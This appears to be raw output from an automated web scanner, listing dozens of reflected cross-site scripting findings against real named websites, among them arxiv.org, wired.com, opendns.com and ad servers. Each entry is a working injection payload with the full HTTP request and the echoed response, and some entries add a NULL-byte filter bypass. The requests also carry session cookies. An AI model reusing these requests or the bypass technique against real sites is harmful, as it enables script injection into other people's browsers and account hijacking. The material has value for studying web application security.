Server: VHFFS / Apache/1.3.34 (Unix) mod_lo/1.0 PHP/4.4.4 with Hardening-Patch mod_ssl/2.8.25 OpenSSL/0.9.8b mod_chroot/0.5
X-Powered-By: PHP/4.4.4 with Hardening-Patch
X-Pingback: http://artlibre.org/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 22 Nov 2010 01:33:17 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 6004
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 1786e</title><script>alert(1)</script>164767422c2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /abs/1003.04491786e</title><script>alert(1)</script>164767422c2 HTTP/1.1
Host: arxiv.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Mon, 22 Nov 2010 01:32:45 GMT
Server: Apache
Set-Cookie: browser=174.121.222.18.1290389565968129; path=/; max-age=946080000; domain=.arxiv.org
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 1824
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xht ...[SNIP]... <title>[1003.04491786e</title><script>alert(1)</script>164767422c2] Bad paper identifier</title> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 19375<script>alert(1)</script>1132cb8b8bf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /abs/1003.044919375<script>alert(1)</script>1132cb8b8bf HTTP/1.1
Host: arxiv.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Mon, 22 Nov 2010 01:32:45 GMT
Server: Apache
Set-Cookie: browser=174.121.222.18.1290389565166801; path=/; max-age=946080000; domain=.arxiv.org
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 1800
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xht ...[SNIP]... <h1>Paper identifier '1003.044919375<script>alert(1)</script>1132cb8b8bf' not recognized</h2> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 3a16c</title><script>alert(1)</script>c9c8fd9cb5e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /abs/1011.37073a16c</title><script>alert(1)</script>c9c8fd9cb5e HTTP/1.1
Host: arxiv4.library.cornell.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Mon, 22 Nov 2010 01:32:47 GMT
Server: Apache
Set-Cookie: browser=174.121.222.18.1290389567349336; path=/; max-age=946080000; domain=.arxiv.org
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 1824
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xht ...[SNIP]... <title>[1011.37073a16c</title><script>alert(1)</script>c9c8fd9cb5e] Bad paper identifier</title> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4e1c1<script>alert(1)</script>0f8702ef860 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /abs/1011.37074e1c1<script>alert(1)</script>0f8702ef860 HTTP/1.1
Host: arxiv4.library.cornell.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Mon, 22 Nov 2010 01:32:45 GMT
Server: Apache
Set-Cookie: browser=174.121.222.18.1290389565501583; path=/; max-age=946080000; domain=.arxiv.org
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 1800
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xht ...[SNIP]... <h1>Paper identifier '1011.37074e1c1<script>alert(1)</script>0f8702ef860' not recognized</h2> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13199"><script>alert(1)</script>c1eaaf68b6c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe13199"><script>alert(1)</script>c1eaaf68b6c/3.0/5113.1/221794/0/-1/size=300x250;noperf=1;alias=93305928;cfp=1;noaddonpl=y;kvpg=tuaw;kvmn=93305928;target=_blank;aduho=360;grp=381570956;misc=381570956 HTTP/1.1
Host: at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.tuaw.com/?b942f%22-alert(1)-%220fce9fc0f52=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: atdses=O; JEB2=4CD6406B6E651A44E171CE41F0006986
Response
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 350
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7d3d"><script>alert(1)</script>c653d13393c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0b7d3d"><script>alert(1)</script>c653d13393c/5113.1/221794/0/-1/size=300x250;noperf=1;alias=93305928;cfp=1;noaddonpl=y;kvpg=tuaw;kvmn=93305928;target=_blank;aduho=360;grp=381570956;misc=381570956 HTTP/1.1
Host: at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.tuaw.com/?b942f%22-alert(1)-%220fce9fc0f52=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: atdses=O; JEB2=4CD6406B6E651A44E171CE41F0006986
Response
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 350
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd1bb"><script>alert(1)</script>795dc3822fb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5113.1fd1bb"><script>alert(1)</script>795dc3822fb/221794/0/-1/size=300x250;noperf=1;alias=93305928;cfp=1;noaddonpl=y;kvpg=tuaw;kvmn=93305928;target=_blank;aduho=360;grp=381570956;misc=381570956 HTTP/1.1
Host: at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.tuaw.com/?b942f%22-alert(1)-%220fce9fc0f52=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: atdses=O; JEB2=4CD6406B6E651A44E171CE41F0006986
Response
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 350
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3b81"><script>alert(1)</script>d7b136c3cd7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5113.1/221794d3b81"><script>alert(1)</script>d7b136c3cd7/0/-1/size=300x250;noperf=1;alias=93305928;cfp=1;noaddonpl=y;kvpg=tuaw;kvmn=93305928;target=_blank;aduho=360;grp=381570956;misc=381570956 HTTP/1.1
Host: at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.tuaw.com/?b942f%22-alert(1)-%220fce9fc0f52=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: atdses=O; JEB2=4CD6406B6E651A44E171CE41F0006986
Response
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 350
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc8ef"><script>alert(1)</script>2480ed798e2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5113.1/221794/0cc8ef"><script>alert(1)</script>2480ed798e2/-1/size=300x250;noperf=1;alias=93305928;cfp=1;noaddonpl=y;kvpg=tuaw;kvmn=93305928;target=_blank;aduho=360;grp=381570956;misc=381570956 HTTP/1.1
Host: at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.tuaw.com/?b942f%22-alert(1)-%220fce9fc0f52=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: atdses=O; JEB2=4CD6406B6E651A44E171CE41F0006986
Response
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 350
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0eb1"><script>alert(1)</script>6026b3de44a was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5113.1/221794/0/-1e0eb1"><script>alert(1)</script>6026b3de44a/size=300x250;noperf=1;alias=93305928;cfp=1;noaddonpl=y;kvpg=tuaw;kvmn=93305928;target=_blank;aduho=360;grp=381570956;misc=381570956 HTTP/1.1
Host: at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.tuaw.com/?b942f%22-alert(1)-%220fce9fc0f52=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: atdses=O; JEB2=4CD6406B6E651A44E171CE41F0006986
Response
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 350
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee20a"><script>alert(1)</script>b927cf1665f was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5113.1/221794/0/-1/sizeee20a"><script>alert(1)</script>b927cf1665f=300x250;noperf=1;alias=93305928;cfp=1;noaddonpl=y;kvpg=tuaw;kvmn=93305928;target=_blank;aduho=360;grp=381570956;misc=381570956 HTTP/1.1
Host: at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.tuaw.com/?b942f%22-alert(1)-%220fce9fc0f52=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: atdses=O; JEB2=4CD6406B6E651A44E171CE41F0006986
Response
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 350
1.96. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://at.atwola.com
Path: /adiframe/3.0/5113.1/221794/0/-1/size=300x250
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc670"><script>alert(1)</script>e55e2aeba0c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5113.1/221794/0/-1/size=300x250;noperf=1;alias=93305928;cfp=1;noaddonpl=y;kvpg=tuaw;kvmn=93305928;target=_blank;aduho=360;grp=381570956;misc=381570956&fc670"><script>alert(1)</script>e55e2aeba0c=1 HTTP/1.1
Host: at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.tuaw.com/?b942f%22-alert(1)-%220fce9fc0f52=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: atdses=O; JEB2=4CD6406B6E651A44E171CE41F0006986
Response
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 353
The value of the noperf request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ed98"><script>alert(1)</script>b265eeb37a0 was submitted in the noperf parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adiframe/3.0/5113.1/221794/0/-1/size=300x250;noperf=1;alias=93305928;cfp=1;noaddonpl=y;kvpg=tuaw;kvmn=93305928;target=_blank;aduho=360;grp=381570956;misc=3815709563ed98"><script>alert(1)</script>b265eeb37a0 HTTP/1.1
Host: at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.tuaw.com/?b942f%22-alert(1)-%220fce9fc0f52=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: atdses=O; JEB2=4CD6406B6E651A44E171CE41F0006986
Response
HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 350
1.98. http://boxing.fanhouse.com/2010/11/13/pacquiao-vs-margarito-results-live-updates-of-undercard-and-ma/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 96dad"-alert(1)-"01208aaeb95 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2010/11/13/pacquiao-vs-margarito-results-live-updates-of-undercard-and-ma/?96dad"-alert(1)-"01208aaeb95=1 HTTP/1.1
Host: boxing.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
1.99. http://boxing.fanhouse.com/2010/11/13/pacquiao-vs-margarito-results-live-updates-of-undercard-and-ma/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6954"><script>alert(1)</script>40c64d26d0b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/13/pacquiao-vs-margarito-results-live-updates-of-undercard-and-ma/?f6954"><script>alert(1)</script>40c64d26d0b=1 HTTP/1.1
Host: boxing.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <link rel="canonical" href="http://boxing.fanhouse.com/2010/11/13/pacquiao-vs-margarito-results-live-updates-of-undercard-and-ma/?f6954"><script>alert(1)</script>40c64d26d0b=1"/> ...[SNIP]...
1.100. http://cde.cerosmedia.com/WIRED_MAY_SAMPLER/1S4bb37141d5ff4012.cde [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://cde.cerosmedia.com
Path: /WIRED_MAY_SAMPLER/1S4bb37141d5ff4012.cde
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74bdf</script><script>alert(1)</script>fbf4f8394ac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /WIRED_MAY_SAMPLER/1S4bb37141d5ff4012.cde?74bdf</script><script>alert(1)</script>fbf4f8394ac=1 HTTP/1.1
Host: cde.cerosmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Mon, 22 Nov 2010 01:52:51 GMT
Server: Apache
Set-Cookie: CerosStats=aWR8ZGExNDc5NmJkM2Y1N2EyZDVjMDA0MTY5OGE3YzU5NGQ%3D; expires=Thu, 19-Nov-2020 01:52:51 GMT; path=/; domain=.cerosmedia.com
Content-Length: 7488
Connection: close
Content-Type: text/html;charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of the offerid request parameter is copied into the HTML document as plain text between tags. The payload 12c1f<script>alert(1)</script>7027a7ea3c was submitted in the offerid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 400 Bad Request
Server: Apache-Coyote/1.1
Content-Length: 257
Date: Mon, 22 Nov 2010 01:34:08 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title>Error</title></head><body> Bad number format in offerid: For input string: "12c1f<script>alert(1)</script>7027a7ea3c" </body> ...[SNIP]...
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload cdaef<script>alert(1)</script>0e666a83707 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /json.js?url=%2Fculture%2Fart%2Fmultimedia%2F2008%2F07%2Fgallery_faves_food&uid=&offset=0&callback=commentBroker.handleEventcdaef<script>alert(1)</script>0e666a83707&eventName=comments_0&markdown=true&limit=10 HTTP/1.1
Host: comments.wired.com
Proxy-Connection: keep-alive
Referer: http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food?f56a1%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=c1361f6-12c7006e158-7792a530-1; mobify=0
Response
HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Server: Spezserver/0.1
Vary: Accept-Encoding
X-N: S
Date: Mon, 22 Nov 2010 01:40:43 GMT
Connection: close
Content-Length: 3429
The value of the eventName request parameter is copied into the HTML document as plain text between tags. The payload c37f4<script>alert(1)</script>76a0335a7e3 was submitted in the eventName parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /json.js?url=%2Fculture%2Fart%2Fmultimedia%2F2008%2F07%2Fgallery_faves_food&uid=&offset=0&callback=commentBroker.handleEvent&eventName=comments_0c37f4<script>alert(1)</script>76a0335a7e3&markdown=true&limit=10 HTTP/1.1
Host: comments.wired.com
Proxy-Connection: keep-alive
Referer: http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food?f56a1%22%3E%3Cscript%3Ealert(1)%3C/script%3EHOYT.LLC.RESEARCH.XSS.PoC.11.21.2010.www.wired.com.1900.GMT=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=c1361f6-12c7006e158-7792a530-1; mobify=0
Response
HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Server: Spezserver/0.1
Vary: Accept-Encoding
X-N: S
Date: Mon, 22 Nov 2010 01:40:48 GMT
Connection: close
Content-Length: 3429
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %007fc71"><script>alert(1)</script>f888a9f8a9b was submitted in the REST URL parameter 1. This input was echoed as 7fc71"><script>alert(1)</script>f888a9f8a9b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00dc217"><script>alert(1)</script>304ac110a42 was submitted in the REST URL parameter 2. This input was echoed as dc217"><script>alert(1)</script>304ac110a42 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
1.106. http://ideabank.opendns.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ideabank.opendns.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89e1f"><script>alert(1)</script>2b044539dbc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?89e1f"><script>alert(1)</script>2b044539dbc=1 HTTP/1.1
Host: ideabank.opendns.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OPENDNS_ACCOUNT=529fbcc8cec610ec6661657a296dbfc8; __kti=1289593273346,http%3A%2F%2Fideabank.opendns.com%2Fupcoming.php%3Fca37d%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253Ecc21d24e55d%3D1,; __ktv=5926-ef2-1156-d97312c41bfbc05; __utmx=207386316.00012306182230551517:3:3; __utmxx=207386316.00012306182230551517:1773685:2592000; __utmz=207386316.1290263893.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=http://opendns.com/; __utma=207386316.1945980142.1290263893.1290263893.1290263893.1
Response
HTTP/1.1 200 OK
Date: Mon, 22 Nov 2010 01:51:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 104500
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head>
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9be87"%3balert(1)//363c5691df7 was submitted in the mpck parameter. This input was echoed as 9be87";alert(1)//363c5691df7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/0/3992/crucial_knows_notebook_160x600.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F3992-114624-33380-1%3Fmpt%3D4949634979be87"%3balert(1)//363c5691df7&mpt=494963497&mpvc= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.xml.com/pub/a/2003/07/23/extendingrss.html?99584--%3E%3Cscript%3Ealert(1)%3C/script%3E0a38ce97934=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT; __utmz=183366586.1289108887.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.1043956060.1289108887.1289108887.1289108887.1
Response
HTTP/1.1 200 OK
Date: Mon, 22 Nov 2010 01:51:51 GMT
Server: Apache
Last-Modified: Thu, 07 Oct 2010 19:53:04 GMT
ETag: "6466be-b9e-4920c3dfb8800"
Accept-Ranges: bytes
Content-Length: 4081
Content-Type: application/x-javascript
function MediaplexFlashAOL(){ var mp_swver = 0, mp_html = "";
